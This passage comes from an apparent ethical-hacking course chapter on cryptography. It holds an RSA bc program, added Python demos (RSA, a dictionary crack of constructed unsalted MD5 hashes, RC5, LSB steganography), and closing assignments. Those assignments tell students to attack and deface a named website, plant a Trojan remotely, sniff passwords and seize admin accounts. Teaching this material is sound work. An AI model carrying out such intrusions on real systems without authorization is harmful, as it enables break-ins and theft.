the European Union, electronic signatures have legal significance. However, laws
concerning electronic signatures do not always make clear their applicability towards
cryptographic digital signatures, leaving their legal importance somewhat unspecified.
11.3 RSA (Rivest Shamir Adleman)_________________
Named after its inventors, Ron Rivest, Adi Shamir and Leonard Adleman, RSA
encryption transforms the number "char" into the number "cipher" with the formula
cipher = char^e (mod n)
The numbers e and n are the two numbers you create and publish. They are your
"public key." The number char can be simply the numeric value of a block of ASCII
characters, and it must be smaller than n. The formula says: raise char to the power e,
divide the result by the number n and save only the remainder. The remainder, which we
have called cipher, is the encrypted representation of char. Decryption uses the private
exponent d, which only you know: char = cipher^d (mod n). Used in this raw form
("textbook RSA") the scheme is deterministic and malleable, so real implementations
always apply a padding scheme such as OAEP to the message block before encrypting it.
Example of RSA algorithm
Figure: 11.3
RSA Attacks
1. Brute force: factoring n into p and q
2. Esoteric attacks
3. Chosen-ciphertext attacks
4. Low encryption exponent attacks
5. Error analysis
6. Other attacks
The GNU bc Calculator
Our test program for calculating RSA keys, rsakeys.bc, is written for GNU bc, Philip A.
Nelson's arbitrary-precision calculator language. A program written for bc is well suited
to this experimental work, because it can handle integers of arbitrary size.
11.3.1 Setting up RSA
To set up RSA encryption, the main thing you need is a table of prime numbers. Begin
by selecting two prime numbers at random. When the rsakeys.bc program asks for p
and q, give it the two primes you selected. Small primes are fine for practice, but p and q
really must be prime: if they are not, (p-1)*(q-1) is no longer the right modulus for finding
d, and decryption fails for most messages. Large primes (hundreds of digits each) are
what make it infeasible for an eavesdropper to factor n, recover d and decrypt your
messages.
Call the program with the command bc rsakeys.bc. After you enter the numbers p and q,
the program asks for a random number to be used to start a search for keys. When the
program finds a pair of keys, it prints out results and pauses for keyboard input. Enter a
negative number to quit. Or, if you don't like the key pair offered, enter any positive
number to continue the search for another pair of keys. The value that you enter, to
continue or to stop, doesn't matter; only its sign is checked.
The search finds two numbers, e and d, such that their product, modulo the number
(p-1)*(q-1), is 1. In other words, the numbers e and d are such that their product minus 1,
e*d - 1, is an integer multiple of the number (p-1)*(q-1).
Example Key Search
Using small numbers for clarity, here are results of an example run:
Enter prime p: 47
Enter prime q: 71
n = p*q = 3337
(p-1)*(q-1) = 3220
Guess a large value for public key e then we can work down from there.
Enter trial public key e: 79
Trying e = 79
Use private key d:
1019
Publish e:
79
and n:
3337
cipher = char^e (mod n) char = cipher^d (mod n)
Enter any positive value to continue search for next e
The output above was created by the following bc program.
# rsakeys.bc: generate RSA keys
# These bc routines are transliterations of the C routines found in
# Bruce Schneier's "Applied Cryptography", Wiley, New York, 1994.
# ISBN 0-471-59756-2
# Run with: bc rsakeys.bc   (GNU bc: uses print, read() and halt)

# modexp: from page 200. Right-to-left binary exponentiation: return a ^ x mod n
define modexp(a, x, n) {
    auto r
    r = 1
    while ( x > 0 ) {
        if ( (x % 2) == 1 ) {
            r = (r * a) % n
        }
        a = (a * a) % n
        x /= 2
    }
    return(r)
}

# extended Euclidean algorithm, adapted from C.
# Returns gcd(u, v) and leaves the globals u1out, u2out such that
# u1out*u + u2out*v == gcd(u, v); when the gcd is 1, u1out is the inverse of u mod v
define exteuclid(u, v) {
    auto q, tn
    u1 = 1
    u3 = u
    v1 = 0
    v3 = v
    while ( v3 > 0 ) {
        q = u3 / v3
        tn = u1 - v1 * q
        u1 = v1
        v1 = tn
        tn = u3 - v3 * q
        u3 = v3
        v3 = tn
    }
    u1out = u1
    u2out = ( u3 - u1 * u ) / v
    return(u3)
}

print "enter prime p: "; p = read()
print "enter prime q: "; q = read()
n = p * q
phi = (p-1) * (q-1)
print " n = p*q = ", n
print "\n(p-1)*(q-1) = ", phi
print "\n Guess a large value for public key e "
print "\n then we can work down from there."
print "\n enter trial public key e: "; e = read()
# Walk e downwards two at a time: phi is even for odd primes, so an even e can
# never have an inverse (this assumes the trial value entered is odd).
while ( e > 0 ) {
    print "\ntrying e = ", e
    gcd = exteuclid(e, phi)
    d = u1out
    if ( gcd == 1 ) {
        # Invert d again as a check: u1out comes back equal to e only when d is
        # a positive inverse in range (a negative d from exteuclid fails this
        # test), so otherwise keep searching.
        nextgcd = exteuclid(u1out, phi)
        # print "nextgcd = ", nextgcd
        if ( u1out == e ) {
            # print "\nthat one works "
            print "\n\nUse private key d:\n", d
            print "\n\n Publish e:\n", e, "\n and n:\n", n
            print "\ncipher = char^e (mod n)"
            print " char = cipher^d (mod n)"
            print "\nenter any positive value"
            print " to continue search for next e "
            go = read()
            if (go < 0) { break }
        }
    }
    e = e - 2
}
print "\n"
halt
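The same computation in Python, as an added example that is not part of the original text or of rsakeys.bc: the key search is done directly with the extended Euclidean algorithm, the encryption and decryption formulas of section 11.3 are applied to a character, a toy hash-then-sign signature illustrates section 11.2.2.2, and the last function shows the malleability behind the "chosen-ciphertext attack" entry in the RSA Attacks list. The numbers 47, 71 and 79 are the ones from the example run above; the message strings are constructed for the example, and the signature routine reduces the digest modulo n only because this n is tiny.

```python
import hashlib

# Textbook RSA in Python, added here as an example (not the page's code): the key
# search of rsakeys.bc done with the extended Euclidean algorithm, encryption and
# decryption with the formulas above, a toy hash-then-sign signature for the
# digital-signature section, and a demonstration of the malleability that the
# "chosen ciphertext attack" entry in the RSA Attacks list refers to.

def egcd(a: int, b: int):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0

def rsa_keygen(p: int, q: int, e: int):
    """(n, e, d) for primes p, q and public exponent e; e must be invertible mod (p-1)(q-1)."""
    n, phi = p * q, (p - 1) * (q - 1)
    g, x, _ = egcd(e, phi)
    if g != 1:
        raise ValueError(f"e={e} has no inverse modulo phi={phi}: pick another e")
    d = x % phi                  # bring d into 0 < d < phi (rsakeys.bc rejects a negative d instead)
    assert (e * d) % phi == 1
    return n, e, d

def rsa_encrypt(char: int, n: int, e: int) -> int:
    if not 0 <= char < n:
        raise ValueError("a block must be a number smaller than n")
    return pow(char, e, n)       # cipher = char^e (mod n)

def rsa_decrypt(cipher: int, n: int, d: int) -> int:
    return pow(cipher, d, n)     # char = cipher^d (mod n)

def _digest_mod_n(message: bytes, n: int) -> int:
    # Toy: the SHA-256 digest is reduced mod n only because the example n is tiny.
    # Real signatures pad the full digest (PKCS#1 v1.5 or PSS) and use n of 2048+ bits.
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n

def rsa_sign(message: bytes, n: int, d: int) -> int:
    return pow(_digest_mod_n(message, n), d, n)         # sign with the private key

def rsa_verify(message: bytes, sig: int, n: int, e: int) -> bool:
    return pow(sig, e, n) == _digest_mod_n(message, n)  # verify with the public key

def malleability_demo(n: int, e: int, d: int, m1: int, m2: int) -> bool:
    """Raw RSA is multiplicatively homomorphic: E(m1)*E(m2) == E(m1*m2) (mod n).
    Anyone can thus build a new valid ciphertext from two captured ones without
    the key, which is what padding schemes such as OAEP are there to prevent."""
    forged = (rsa_encrypt(m1, n, e) * rsa_encrypt(m2, n, e)) % n
    return rsa_decrypt(forged, n, d) == (m1 * m2) % n

if __name__ == "__main__":
    n, e, d = rsa_keygen(47, 71, 79)                    # the page's example run
    print(f"n={n} e={e} d={d}")                         # n=3337 e=79 d=1019
    c = rsa_encrypt(ord("A"), n, e)
    print("A ->", c, "->", chr(rsa_decrypt(c, n, d)))
    s = rsa_sign(b"pay Bob 100", n, d)
    print("valid:", rsa_verify(b"pay Bob 100", s, n, e),
          "tampered:", rsa_verify(b"pay Bob 900", s, n, e))
    print("malleable:", malleability_demo(n, e, d, 5, 7))
```

Note that rsa_keygen refuses an e that shares a factor with (p-1)*(q-1), which is the case the bc program silently skips over with its gcd check, and that pow(x, y, n) is Python's built-in modular exponentiation, the equivalent of modexp in the bc listing.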
11.4 MD5_______________________________________
The MD5 algorithm takes as input a message of arbitrary length and produces as output
a 128-bit "fingerprint" or "message digest" of the input. MD5 was intended for digital
signature applications, where a large file must be "compressed" in a secure manner
before being signed with a private (secret) key under a public-key cryptosystem such as
RSA. That use is no longer safe: practical collisions (two different inputs with the same
MD5 digest) have been known since 2004, so MD5 must not be used where collision
resistance matters, such as signatures and certificates.
The largest deployment of systems that depend on this ability to authenticate their users
is by far the password contingent. Unfortunately, telnet, which sends the password in the
clear, is about the height of password exchange technology at many sites, and most Web
sites still do not use a digest scheme such as HTTP Digest authentication (which is built
on MD5) to exchange passwords. Storing passwords as bare, unsalted MD5 hashes is not
much better: the hash is fast to compute, so a dictionary attack can test millions of
guesses per second against a stolen password file.
It could be worse; passwords to every company could be printed in the classified section
of the New York Times. That's a comforting thought. "If our firewall goes, every device
around here is owned. But at least my passwords aren't in the New York Times."
11.5 SHA (Secure Hash Algorithm)_________________
The SHA-1 algorithm takes as input a message of arbitrary length and produces as output
a 160-bit "fingerprint" or "message digest" of the input. The algorithm is slightly slower
than MD5, but the larger message digest makes it more resistant to brute-force collision
and inversion attacks. SHA-1 has since been broken as well (a practical collision was
published in 2017); current systems use the SHA-2 family (SHA-256, SHA-384, SHA-512)
or SHA-3, whose digests are 256 bits or longer.
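The following Python program is an added example, not part of the original text, that makes the points of sections 11.4 and 11.5 concrete: the digest sizes of MD5, SHA-1 and SHA-256, the avalanche effect (a one-bit change in the input flips about half the digest bits), a dictionary attack on a password file stored as unsalted MD5 hashes, and the salted, iterated PBKDF2-HMAC-SHA256 scheme that such a file should use instead. The word list, the user names and their passwords are constructed for the example.

```python
import hashlib
import hmac
import os

# Added example, not from the page: digest sizes and the avalanche effect for
# MD5, SHA-1 and SHA-256, then a dictionary attack on unsalted MD5 password
# hashes beside the salted, iterated alternative (PBKDF2-HMAC-SHA256).
# The word list and the "stolen" password file are constructed here.

ALGOS = ("md5", "sha1", "sha256")

def digest_bits(msg: bytes) -> dict:
    """Output size in bits per algorithm: 128 for MD5, 160 for SHA-1, 256 for SHA-256."""
    return {a: hashlib.new(a, msg).digest_size * 8 for a in ALGOS}

def bits_changed(msg: bytes, algo: str) -> int:
    """Flip one bit of msg and count how many digest bits change.
    For any sound hash this is about half the digest (avalanche effect)."""
    flipped = bytes([msg[0] ^ 0x01]) + msg[1:]
    a = int.from_bytes(hashlib.new(algo, msg).digest(), "big")
    b = int.from_bytes(hashlib.new(algo, flipped).digest(), "big")
    return bin(a ^ b).count("1")

# Constructed data: a small word list and three users whose "shadow" entries are
# bare MD5 hashes of their passwords, the weak scheme this section warns about.
WORDLIST = [b"123456", b"password", b"letmein", b"qwerty", b"summer2009", b"dragon"]
SHADOW = {"alice": hashlib.md5(b"letmein").hexdigest(),
          "bob": hashlib.md5(b"summer2009").hexdigest(),
          "carol": hashlib.md5(b"Tr0ub4dor&3").hexdigest()}    # not in the word list

def crack_unsalted_md5(shadow: dict, wordlist) -> dict:
    """Hash each candidate once and look every user up in the result: with no
    salt, one MD5 per word tests all users at the same time."""
    table = {hashlib.md5(w).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in shadow.items() if h in table}

def store_password(pw: bytes, salt: bytes = None, rounds: int = 100_000) -> str:
    """Salted, iterated hash: a per-user 16-byte salt defeats precomputed tables
    and the shared lookup above; the round count makes each guess expensive."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw, salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"

def check_password(stored: str, pw: bytes) -> bool:
    _, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", pw, bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)       # constant-time comparison

if __name__ == "__main__":
    msg = b"The quick brown fox"
    print(digest_bits(msg))
    for a in ALGOS:
        print(a, "digest bits changed by a 1-bit input change:", bits_changed(msg, a))
    print("cracked:", crack_unsalted_md5(SHADOW, WORDLIST))
    rec = store_password(b"letmein")
    print(rec)
    print("correct:", check_password(rec, b"letmein"), "wrong:", check_password(rec, b"letmeout"))
```

Running it shows alice and bob recovered with six MD5 computations in total, while carol's password survives only because it is not in the list; the PBKDF2 record, by contrast, has to be attacked one user at a time and at 100,000 iterations per guess.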
SSL (Secure Socket Layer)
The Secure Sockets Layer (SSL) is a commonly-used protocol for managing the security of
a message transmission on the Internet. SSL has been succeeded by Transport Layer
Security (TLS), which is based on SSL; SSL 2.0 and 3.0 are now deprecated, and TLS 1.2
or 1.3 should be used. SSL is a program layer located between an application protocol
such as the Hypertext Transfer Protocol (HTTP) and the Transmission Control Protocol
(TCP). SSL is included as part of both the Microsoft and Netscape browsers and most Web
server products. Developed by Netscape, SSL also gained the support of Microsoft and
other Internet client/server developers and became the de facto standard until evolving
into Transport Layer Security. The "sockets" part of the term refers to the sockets method
of passing data back and forth between a client and a server program in a network or
between program layers in the same computer. SSL uses public-key cryptography (RSA
among other algorithms) and a digital certificate to authenticate the server and to agree
on session keys; the data itself is then encrypted with a symmetric cipher.
RC5
1. RC5 is a fast block cipher designed by Ron Rivest for RSA Security in 1994.
2. It is a parameterized algorithm with a variable block size (32, 64 or 128 bits, i.e. two
16-, 32- or 64-bit words), a variable key size (0 to 2040 bits) and a variable number of
rounds (0 to 255). A particular choice is written RC5-w/r/b; the usual nominal choice is
RC5-32/12/16, a 64-bit block, 12 rounds and a 128-bit key.
3. RC6 is a block cipher based on RC5. Like RC5, RC6 is a parameterized algorithm
where the block size, the key size and the number of rounds are again variable. The
upper limit on the key size is 2040 bits.
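As an added example serving both the modes-of-operation discussion in section 11.2.1 and the RC5 notes above, the following Python program implements RC5 with the three parameters exposed (word size w, rounds r and the key) following the key schedule and round functions of Rivest's specification, and then builds ECB and CBC modes on top of it. It is not the page's code and not a production implementation (a real deployment would use a maintained library, and this code should be checked against the published RC5 test vectors before being relied on); the key, IV and plaintext are constructed. The demo encrypts eight identical plaintext blocks in both modes so that the pattern leak of ECB can be counted.

```python
# RC5-w/r/b (w-bit words, r rounds, b-byte key) in pure Python, an added example of a
# parameterized block cipher, plus ECB and CBC modes built on it. Not the page's code
# and not a production implementation; key, IV and plaintext below are constructed.

def _rotl(x, s, w):
    s %= w
    return ((x << s) | (x >> (w - s))) & ((1 << w) - 1)

def _rotr(x, s, w):
    s %= w
    return ((x >> s) | (x << (w - s))) & ((1 << w) - 1)

class RC5:
    # Magic constants P_w (from e) and Q_w (from the golden ratio) for each word size.
    _PQ = {16: (0xB7E1, 0x9E37), 32: (0xB7E15163, 0x9E3779B9),
           64: (0xB7E151628AED2A6B, 0x9E3779B97F4A7C15)}

    def __init__(self, key: bytes, w: int = 32, r: int = 12):
        self.w, self.r, self.mask = w, r, (1 << w) - 1
        self.block_size = w // 4                      # two w-bit words, in bytes
        u = w // 8                                    # bytes per word
        c = max(1, (len(key) + u - 1) // u)
        # Key bytes -> c little-endian words (zero padded), as in the RC5 key schedule
        L = [int.from_bytes(key[i * u:(i + 1) * u].ljust(u, b"\0"), "little") for i in range(c)]
        t = 2 * (r + 1)
        P, Q = self._PQ[w]
        S = [(P + i * Q) & self.mask for i in range(t)]   # initial round-key table
        i = j = A = B = 0
        for _ in range(3 * max(t, c)):                # mix the key into the table
            A = S[i] = _rotl((S[i] + A + B) & self.mask, 3, w)
            B = L[j] = _rotl((L[j] + A + B) & self.mask, A + B, w)
            i, j = (i + 1) % t, (j + 1) % c
        self.S = S

    def encrypt_block(self, block: bytes) -> bytes:
        w, m, S, h = self.w, self.mask, self.S, self.w // 8
        A = (int.from_bytes(block[:h], "little") + S[0]) & m
        B = (int.from_bytes(block[h:], "little") + S[1]) & m
        for i in range(1, self.r + 1):
            A = (_rotl(A ^ B, B, w) + S[2 * i]) & m
            B = (_rotl(B ^ A, A, w) + S[2 * i + 1]) & m
        return A.to_bytes(h, "little") + B.to_bytes(h, "little")

    def decrypt_block(self, block: bytes) -> bytes:
        w, m, S, h = self.w, self.mask, self.S, self.w // 8
        A = int.from_bytes(block[:h], "little")
        B = int.from_bytes(block[h:], "little")
        for i in range(self.r, 0, -1):                # undo the rounds in reverse order
            B = _rotr((B - S[2 * i + 1]) & m, A, w) ^ A
            A = _rotr((A - S[2 * i]) & m, B, w) ^ B
        B, A = (B - S[1]) & m, (A - S[0]) & m
        return A.to_bytes(h, "little") + B.to_bytes(h, "little")

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def pad(data: bytes, bs: int) -> bytes:               # PKCS#7: always at least one byte
    n = bs - len(data) % bs
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= len(data) or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def ecb_encrypt(cipher: RC5, data: bytes) -> bytes:   # each block on its own: leaks repeats
    bs, data = cipher.block_size, pad(data, cipher.block_size)
    return b"".join(cipher.encrypt_block(data[i:i + bs]) for i in range(0, len(data), bs))

def cbc_encrypt(cipher: RC5, data: bytes, iv: bytes) -> bytes:
    bs, data = cipher.block_size, pad(data, cipher.block_size)
    out, prev = [iv], iv                              # the IV travels in the clear, first
    for i in range(0, len(data), bs):
        prev = cipher.encrypt_block(_xor(data[i:i + bs], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(cipher: RC5, data: bytes) -> bytes:
    bs, out, prev = cipher.block_size, [], data[:cipher.block_size]
    for i in range(bs, len(data), bs):
        out.append(_xor(cipher.decrypt_block(data[i:i + bs]), prev))
        prev = data[i:i + bs]
    return unpad(b"".join(out))

def distinct_blocks(ct: bytes, bs: int) -> int:
    return len({ct[i:i + bs] for i in range(0, len(ct), bs)})

def demo(key: bytes = b"constructed-key!", iv: bytes = b"fixed-iv") -> dict:
    """Eight identical plaintext blocks: ECB repeats one ciphertext block eight
    times (plus a padding block); CBC produces nine different blocks. The fixed
    IV is for reproducibility only: a real IV must be fresh per message."""
    cipher, pt = RC5(key), b"ATTACK!!" * 8             # RC5-32/12/16
    ecb, cbc = ecb_encrypt(cipher, pt), cbc_encrypt(cipher, pt, iv)
    return {"ecb_distinct": distinct_blocks(ecb, 8), "cbc_distinct": distinct_blocks(cbc[8:], 8),
            "cbc_roundtrip": cbc_decrypt(cipher, cbc) == pt}

if __name__ == "__main__":
    print(demo())        # {'ecb_distinct': 2, 'cbc_distinct': 9, 'cbc_roundtrip': True}
```

The parameters are what make this a family rather than one cipher: RC5(key, w=16, r=8) works on 32-bit blocks and RC5(key, w=64, r=20) on 128-bit blocks with no other change. Note that neither mode here authenticates the ciphertext; a modern design would add a MAC or use an authenticated mode.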
11.5.1 What is SSH?
Secure Shell (SSH), sometimes known as Secure Socket Shell, is a command interface
and protocol, originally for Unix, for securely getting access to a remote computer. It is
widely used by network administrators to control Web and other kinds of servers
remotely. SSH started as a suite of three utilities, slogin, ssh and scp, that are secure
versions of the earlier UNIX utilities rlogin, rsh and rcp. SSH connections are encrypted
and secured in several ways. The server is authenticated by its host key, whose
fingerprint the client checks against its known_hosts list on first contact (it uses host
keys, not X.509 certificates), and the user is authenticated either by a password sent
inside the encrypted channel or by a public key. The original SSH1 protocol used RSA
public-key cryptography for both connection and authentication, with Blowfish, DES and
IDEA as encryption algorithms, IDEA being the default.
SSH2, the current version, is standardised by the Internet Engineering Task Force (IETF)
(RFC 4251 and its companions). SSH2 is a more secure, efficient and portable version of
SSH that adds Diffie-Hellman key exchange, DSA and later ECDSA and Ed25519 keys,
modern ciphers such as AES, and SFTP, a file transfer protocol that runs inside the SSH2
channel (it is not FTP tunnelled through SSH). SSH1 is obsolete and should be disabled.
PGP (Pretty Good Privacy)
1. Pretty Good Privacy (PGP) is a software package originally developed by Philip R.
Zimmermann that provides cryptographic routines for e-mail and file storage
applications.
2. Zimmermann took existing cryptosystems and cryptographic protocols and
developed a program that can run on multiple platforms. It provides message
encryption, digital signatures, data compression and e-mail compatibility (ASCII armor).
The private keys are protected on disk by a passphrase, which is why the passphrase is
the usual target of an attacker who gets hold of a key ring.
Figure: 11.4
11.5.2 Hacking Tool: PGP Crack
http://munitions.iglu.cjb.net/dolphin.cgi?action=render&category=0406
1. PGP Crack is a program designed to brute-force (dictionary-attack) the passphrase of
a conventionally encrypted PGP file or of a PGP secret key.
2. The file "pgpfile" must not be ASCII-armored. The file "phraselist" should be a file
containing all of the passphrases that will be tried against the encrypted file. The attack
succeeds only against weak passphrases: a long passphrase that is not in any word list
cannot be recovered this way.
11.6 Tool: WonderCrypt__________________________
WonderCrypt is a solution for secure information exchange and storage.
Figure: 11.5
Information Exchange (Mail & File) Security:
Privacy: Protect your message from being read by un-authorised recipients.
Integrity: Ensure that the recipient receives exactly what you have sent i.e. message
has not been changed by any interceptor.
Identity and Authentication: Authenticate the message with your Identity to create
Trust with the recipient.
Security of User Identity (Private Key): You can remove your User Identity (Private
Key) from the hard disk and keep it safe on removable media such as a floppy, CD or Zip
drive, so you can carry your User Identity with you and sign in even on a public terminal
that has WonderCrypt installed. To secure or read your mail it will not be necessary to
copy your User Identity onto this public terminal. "To store your User Identity on an
access protected USB Token purchase the Herald version, that comes with a USB Token,
from http://www.wondercrypt.com."
Information Storage Security:
File and Folder Encryption: Encrypt selected files or all files in a folder in one click.
Secure delete: Overwrite files before deleting them so that they cannot be recovered
with undelete tools (note that overwriting in place is not reliable on journaling file
systems, flash drives or SSDs, where earlier copies of the data may survive).
Self-Decrypting File:
Convenient utility: Secure a file with an out of band shared password so that only the
intended recipient can access the contents, even if the recipient does not have this
software.
Security of your personal data:
Security of some of your private data: You can store some private data on Key Token
and carry on your key chain. "To use this feature purchase Herald version, that comes
with a USB Token, from http://www.wondercrypt.com."
WonderCrypt uses public key infrastructure (PKI) to achieve the messaging security
features as described above. PKI establishes a secure method of exchanging
information on a public insecure network like the Internet. It includes the use of
cryptographic methods, digital signatures, certificates, and certificate authorities.
Public key infrastructure’s basic components from an end user’s perspective are
keys:
Your User Identity (Private Key): Used to sign a document and also to decrypt mail or
files encrypted using your public key. A new private key is created when you create your
User Identity. This key you never share.
Your Public Identity (Public Key): Used by others to verify your signature and also to
encrypt mail or files that only you can decrypt. Your public key also gets created
automatically when you create your User Identity. This key should be known to public
hence you distribute it freely so that others can verify a mail or file signed by you and
also encrypt mail or file that they send to you. Only you can read mail or file encrypted
using your public key.
The Options of Contacts and Key Management:
Creating a New User Identity creates a new Private Key (a PKI key pair that includes
the matching Public Key). Alternatively, you can create a New User Identity that uses
an existing private key from your browser, by exporting it from the browser and then
importing it during New User Sign-Up.
Change user password (Private Key Password).
Create CSR (Certificate Signing Request)
Add a Certificate Authority by importing Certificate Authority Public Key.
Add a Contact by importing Other’s Public Key.
Export your own Public Key to a file so that you can send it to others.
Delete Contacts from your contact list by deleting the contact's public key.
Run CRL (Certificate Revocation List)
Post your public identity (public key file) on an LDAP (Directory) server.
Download a contact's public identity (public key file) from an LDAP server.
Figure: 11.6
Figure: 11.7
The utility features include:
Mail Signing
Mail Encryption
File Signing
File Encryption
Folder Encryption
Self-decrypting file
Secure Delete
Desktop Security: File and Folder Encryption
My Passwords.
User Identity storage on Key Token
11.7 Steganography_____________________________
Steganography is the practice of hiding the existence of a message by embedding it in
some other, innocent-looking carrier (an image, an audio or video file, or even plain
text). The most popular method is to use graphic images as the hiding place, typically by
replacing the least-significant bits of the pixel data, which changes the picture far less
than the eye can notice. Unlike encryption, steganography does not aim to make the
data unreadable but to make it unnoticed; the two are usually combined, with the
payload encrypted before it is hidden.
Attackers can embed information such as:
1. Source code for a hacking tool
2. A list of compromised servers
3. Plans for future attacks
4. Your grandma's secret cookie recipe
11.7.1 Tool: S-tool
S-Tools is a steganography program that can hide large amounts of data in images (and
in WAV audio). It encrypts the data before embedding it, and because the bits are written
into the least-significant bits of existing pixels there is no increase in the file size. The
image looks the same in normal paint packages, and because the file is still a plain image
it gets past mail sniffers that look only at attachment types.
Figure: 11.8
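The least-significant-bit technique that S-Tools and similar programs use on uncompressed carriers such as BMP, as an added example in Python that is not the page's or S-Tools' own code. The "image" is a constructed array of 8-bit grey pixels standing in for decoded image data, so no image library is needed; the payload is a constructed sample. The program writes a length header and the payload into the LSBs, reads them back, and checks that the carrier's size is unchanged and no pixel moved by more than one grey level.

```python
# Added example, not the page's or S-Tools' own code: least-significant-bit (LSB)
# embedding in raw 8-bit pixel data, the method used on uncompressed carriers such
# as BMP. The cover "image" and the secret are constructed here.

import random

def _bit_stream(data: bytes):
    for byte in data:
        for k in range(7, -1, -1):
            yield (byte >> k) & 1

def capacity(cover: bytes) -> int:
    """Payload bytes a cover can hold: one bit per pixel, minus a 4-byte length header."""
    return len(cover) // 8 - 4

def embed(cover: bytes, payload: bytes) -> bytes:
    """Write a 4-byte big-endian length header and then the payload into the LSBs."""
    if len(payload) > capacity(cover):
        raise ValueError(f"payload is {len(payload)} bytes; cover holds {capacity(cover)}")
    stego = bytearray(cover)
    for i, bit in enumerate(_bit_stream(len(payload).to_bytes(4, "big") + payload)):
        stego[i] = (stego[i] & 0xFE) | bit       # each pixel changes by at most 1
    return bytes(stego)

def _read_bytes(stego: bytes, start_bit: int, count: int) -> bytes:
    out = bytearray()
    for b in range(count):
        v = 0
        for k in range(8):
            v = (v << 1) | (stego[start_bit + b * 8 + k] & 1)
        out.append(v)
    return bytes(out)

def extract(stego: bytes) -> bytes:
    """Read the length header from the first 32 LSBs, then that many payload bytes."""
    if len(stego) < 32:
        raise ValueError("carrier too small for a header")
    length = int.from_bytes(_read_bytes(stego, 0, 4), "big")
    if 32 + length * 8 > len(stego):
        raise ValueError("header does not describe a payload this carrier could hold")
    return _read_bytes(stego, 32, length)

def max_pixel_change(cover: bytes, stego: bytes) -> int:
    return max(abs(a - b) for a, b in zip(cover, stego))

def make_cover(width: int = 64, height: int = 64, seed: int = 1) -> bytes:
    """Constructed grey-scale 'photo': a horizontal gradient with a little noise."""
    rnd = random.Random(seed)
    return bytes(min(255, (x * 255) // width + rnd.randint(0, 3))
                 for _ in range(height) for x in range(width))

if __name__ == "__main__":
    cover = make_cover()
    secret = b"compromised: 10.0.0.7 10.0.0.9 (constructed sample)"
    stego = embed(cover, secret)
    print("capacity:", capacity(cover), "bytes; size unchanged:", len(stego) == len(cover))
    print("max pixel change:", max_pixel_change(cover, stego))
    print("extracted:", extract(stego))
```

The header is what lets the extractor stop at the right place; a real tool also encrypts the payload first (as S-Tools does), so that the embedded bits look random and carry no recognisable plaintext. The approach breaks down on lossy formats such as JPEG, whose compression discards exactly the low-order information the message is stored in, which is why JPEG tools (JSteg, OutGuess, F5) embed in the compressed coefficients instead.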
11.7.2 Tool: Mp3Stego
MP3Stego will hide information in MP3 files during the compression process.
The data is first compressed, encrypted and then hidden in the MP3 bit stream.
Figure: 11.9
11.8 Steganography Detection_____________________
1. Stegdetect is an automated tool for detecting steganographic content in images.
2. It is capable of detecting several steganographic methods used to embed hidden
information in JPEG images (among them JSteg, JPHide and OutGuess), using statistical
tests on the JPEG coefficients rather than looking for a file signature.
3. Stegbreak is used to launch dictionary attacks against the passphrases of Jsteg-Shell,
JPHide and OutGuess 0.13b.
Assignment-1
Dear Student, please note that Assignment-1 is compulsory and you’ll have to
submit any one from Assignment 2 or 3 also.
Exercise: 1
Do port scanning on the website http://www.anupgirdhar.net and try to find out the
open ports and the services running on those ports. Try to connect to the open ports.
Description: Use some port scanner tools and, with the help of the Internet, find out the
various services running on the various ports.
Time Duration: 3 hrs
Exercise: 2
Suppose you have received a forged mail from someone, try to trace the path
through which the mail came and all the IPs.
Description: Use some e-mail tracing tools to get the whole path and IP.
Time duration: 3 hrs.
Exercise: 3
Try to hack the web site http://www.anupgirdhar.net and collect as much
information as you can.
Description: Try the utilities and the DOS commands to fetch information about
anupgirdhar.net and then try to hack the site with different types of attacks on it.
The target is to add your name to the contents of the front page of the web site.
Time Duration: 4 hrs.
All Rights Reserved, www.sedulitygroups.com
Assignment-2
Dear Student, please note that Assignment-1 is compulsory and you’ll have to
submit any one from Assignment 2 or 3 also.
Exercise: 1
Write a program that uses encryption techniques so that the user can feed in some
strings that are converted into encrypted form, and then decrypt the data again.
Description: Using the C language, write a program that accepts data from the user
and, using any algorithm, converts the data into encrypted form, and afterwards
converts the encrypted data back into decrypted form.
Let the algorithm be, for example:
for encryption:
ch = ch + 3
for decryption:
ch = ch - 3
Time Duration: 2 hrs.
Exercise: 2
Use reverse engineering techniques to edit a file and try to crack it.
Description: Use any reverse engineering tool to open and edit the file and try to
crack it. You can use Hex Workshop, Resource Hacker or any other you like.
Time duration: 3 hrs.
Exercise: 3
Use Sniffers to analyze network traffic and try to get some password files.
Description: Use some network analyzing tools (sniffers)
Time duration 4 hrs
Exercise: 4
Try to install a Trojan on a remote computer without knowing the username and
password of that computer, by scanning the open/closed ports on that PC. Submit a
document of all the actions you took.
Description: To install a Trojan on a remote PC, first scan that particular PC. Try to
install the Trojan on the remote computer over the network and after that scan the PC
again for open ports. Fetch data from that PC without knowing the username and
password. Create documentation for this case study.
Time Duration: 6 hrs.
Assignment-3
Dear Student, please note that Assignment-1 is compulsory and you’ll have to
submit any one from Assignment 2 or 3 also.
Exercise: 1
Try to break into the administrator account and recover the passwords of all the
user accounts, starting from a restricted account.
Description: Try to rename or replace the SAM file to obtain administrative rights, or
use dictionary or brute-force attacks to recover the administrative passwords.
Time Duration: 3 hrs.
Exercise: 2
There is a file on one of the systems in the LAN; try to download it to your system.
After downloading it, analyze it, find out the hidden content in the file and try to
extract the hidden content.
Description: Copy the file containing hidden data from the LAN and try to extract the
hidden content using steganographic tools (e.g. S-Tools).
Time duration: 2hrs.
Exercise: 3
There are some Excel sheets which are password protected, and these sheets are
zipped in an archive that is also password protected. Try to break the passwords and
extract the file.
Description: Use an Advanced Office Password Recovery tool and an Advanced Zip
Password Recovery tool to crack the passwords.
